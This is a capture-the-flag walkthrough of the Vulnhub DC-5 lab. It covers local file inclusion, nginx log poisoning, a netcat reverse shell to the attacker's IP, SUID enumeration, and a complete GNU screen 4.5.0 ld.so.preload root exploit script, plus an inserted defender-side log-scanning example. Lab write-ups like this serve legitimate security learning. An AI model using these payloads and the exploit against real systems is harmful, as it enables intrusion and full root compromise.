
Vulnhub DC-5

2022-06-23 02:29:00 Part 02

Description

DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).

As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.

And just for the record, there is no phpmailer exploit involved. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

The text marked in red means that something will change after the page is refreshed, and the ultimate goal is to get root privileges.

Port scan results: port 111 and port 80 are open.

On the welcome page the text looks like English, but letters are missing, which makes the content hard to read. Following the hint, I refreshed the page repeatedly but did not see any changes.

The URL shown above contains what I filled in earlier. From the URL I guessed a file inclusion, and the goal is still to get root privileges.

 ?file=php://filter/read=convert.base64-encode/resource=index.php

 ?file=/etc/passwd

The shadow file still cannot be displayed, but this confirms that the URL includes local files.

On Linux the default path for system log files is /var/log,

and the Nginx server keeps two logs there: access.log and error.log.

?file=/var/log/nginx/access.log

?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.37.128 5555
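As an added defender-side example (not part of the original writeup), the following Python scans nginx access.log lines for the LFI and log-poisoning pattern used above: stream wrappers or absolute paths in the `file` parameter, a `cmd` parameter alongside it, and PHP tags planted in client-controlled fields. The log lines are constructed, and `/page.php` is a placeholder for the vulnerable script, which the writeup does not name.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Nginx "combined" log format, one named group per field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def analyze_line(line):
    """Return finding tags for one access-log line ([] means nothing suspicious)."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return ["unparsed"]
    findings = []
    target = unquote(m.group("target"))  # decode %2e%2e/ and friends before matching
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in params.get("file", []):  # 'file' is the vulnerable parameter on this box
        low = value.lower()
        if "://" in low:
            findings.append("file:stream-wrapper")         # php://filter, data://, ...
        if low.startswith("/") or "../" in low:
            findings.append("file:absolute-or-traversal")  # /etc/passwd, ../../etc/shadow
        if "/var/log/" in low:
            findings.append("file:log-inclusion")          # reading the poisoned log back
    if "cmd" in params and "file" in params:
        findings.append("file+cmd:webshell-use")           # inclusion plus a command argument
    # PHP injected into any client-controlled field lands in access.log verbatim.
    if any("<?" in f for f in (target, m.group("referer"), m.group("ua"))):
        findings.append("php-tag-in-request")
    return findings

def scan(log_text):
    """Scan a whole log; return (line_no, client_ip, findings) for every flagged line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        findings = analyze_line(line)
        if findings:
            hits.append((n, line.split(" ", 1)[0], findings))
    return hits

# Constructed sample log (not captured from the DC-5 machine); /page.php is a placeholder.
SAMPLE_LOG = """\
192.168.37.1 - - [23/Jun/2022:02:10:11 +0000] "GET /index.php HTTP/1.1" 200 1420 "-" "Mozilla/5.0"
192.168.37.1 - - [23/Jun/2022:02:10:40 +0000] "GET /page.php?file=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
192.168.37.1 - - [23/Jun/2022:02:11:02 +0000] "GET /page.php?file=/etc/passwd HTTP/1.1" 200 1810 "-" "Mozilla/5.0"
192.168.37.1 - - [23/Jun/2022:02:11:30 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo 'poisoned'; ?>"
192.168.37.1 - - [23/Jun/2022:02:11:45 +0000] "GET /page.php?file=/var/log/nginx/access.log&cmd=id HTTP/1.1" 200 90210 "-" "Mozilla/5.0"
"""
```

Calling `scan(SAMPLE_LOG)` flags lines 2 to 5 with their tags; the same functions can be run over a real access.log read from disk.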

Get an interactive shell:

python -c "import pty; pty.spawn('/bin/bash')"

Look for SUID files owned by root:

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;


#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."

# ① First file: libhax.c
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c

# ② Second file: rootshell.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", (char *[]){"sh", NULL});  /* execvp takes two arguments */
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c

echo "[+] Now we create our /etc/ld.so.preload file..."

# ③ Commands to run on the target
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Follow the steps in the script.

Delete the source after compiling:

rm -f /tmp/libhax.c

Write the first file, libhax.c, and the second file, rootshell.c.

Fill them in with the contents from the script.

After compiling we get rootshell; delete the source afterwards:

rm -f /tmp/rootshell.c

Start a web server on 192.168.37.128.

Download the two files onto the target:

wget http://192.168.37.128/libhax.so
wget http://192.168.37.128/rootshell

Run the commands in order:

cd /etc

umask 000

screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"

screen -ls

cd /tmp

./rootshell

Privilege escalation succeeds.

The current working directory is still /tmp; change into the /root directory.

The last step: read the flag.

Copyright notice
This article was written by [Part 02]; when reposting, please include the original link. Thanks.
https://yzsam.com/2022/02/202202211742513943.html